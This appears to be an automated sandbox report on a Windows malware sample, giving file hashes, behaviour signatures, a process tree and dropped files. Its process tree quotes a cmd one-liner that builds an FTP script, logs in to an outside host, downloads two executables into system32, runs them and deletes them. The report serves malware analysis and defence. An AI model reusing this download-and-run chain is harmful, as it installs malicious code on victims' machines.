Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    119s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    06/09/2024, 18:27

General

  • Target

    d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe

  • Size

    44KB

  • MD5

    d0310b6b7e678c1100131d32fdffdf3b

  • SHA1

    901eabee57673826bdd5aa7f33973ab75831f33b

  • SHA256

    e14c582e968dcabd46a973be7a84a5ad6c0f7a2ae75b92f80093024b647a2eee

  • SHA512

    5932d020f1c7cdf18bea240cd92e4159a468591b34fd224fdd9ff77432f0a78f218737496f2d18aed2af3e5b1151f5da357a38939da1ba4377c5d13f2ad7f56d

  • SSDEEP

    768:nomSbguls/uNvGFJw6SYx27CbuwayDh5aeRghbo7te5MpGM9SD8qlG5jpYgXShI1:no9bfl8AvG/JoeBayDkRace

Score
7/10

Malware Config

Signatures

  • Deletes itself 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\d0310b6b7e678c1100131d32fdffdf3b_JaffaCakes118.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2160
    • C:\Windows\SysWOW64\Cmd.exe
      Cmd /c echo open laot.3322.org>>ftpdate.sys&echo ccc>>ftpdate.sys&echo 123>>ftpdate.sys&echo bin>>ftpdate.sys&echo get 360.exe %windir%\system32\Microsoft\360.exe>>ftpdate.sys&echo get XiaoMing.exe %windir%\system32\Microsoft\XiaoMing.exe>>ftpdate.sys&echo bye>>ftpdate.sys&ftp -s:ftpdate.sys&del ftpdate.sys&%windir%\system32\Microsoft\360.exe&%windir%\system32\Microsoft\XiaoMing.exe&Del %windir%\system32\Microsoft\360.exe&Del %windir%\system32\Microsoft\XiaoMing.exe
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2712
      • C:\Windows\SysWOW64\ftp.exe
        ftp -s:ftpdate.sys
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2012
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\Sc.bat""
      2⤵
      • Deletes itself
      • System Location Discovery: System Language Discovery
      PID:1768

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Sc.bat

    Filesize

    210B

    MD5

    163f3ae3f34cca06baa478340b49025c

    SHA1

    7f8f173ed106a95b660969dd5c58ec2beb6ee67e

    SHA256

    fc7dfbf59f55d47bd388dbafe8e9014ef81401d9e03f7a6f442490a84cc1658d

    SHA512

    9eaa09842f86e49ee69a2b8e2861c5d373b83b90ecc2468922097db2520568f74e9b657c600c47e28d8c82fa192932f7acaf59979d73fb55cf67ac757c08a5e7

  • C:\Users\Admin\AppData\Local\Temp\ftpdate.sys

    Filesize

    152B

    MD5

    0fb17816f7c290e13419d68fa258edfa

    SHA1

    59b9dd4af7fa17ce896b878b55b07ddc4a7936f9

    SHA256

    bc1cdde48c4f9a1c95233092cc2ab3c33bec604b4164fa5ed4e6eae994fdbb9c

    SHA512

    5cd2261a9d7d201336a52eb8538d088289ea1161662fc796e47a8da23455218a2a52be004808756645fc59fd19341bd299a82be305f3ce774163192f4a25cc99

  • memory/2160-2-0x0000000004960000-0x00000000059C2000-memory.dmp

    Filesize

    16.4MB

  • memory/2160-11-0x0000000000400000-0x000000000041D000-memory.dmp

    Filesize

    116KB

  • memory/2160-32-0x0000000000400000-0x000000000041D000-memory.dmp

    Filesize

    116KB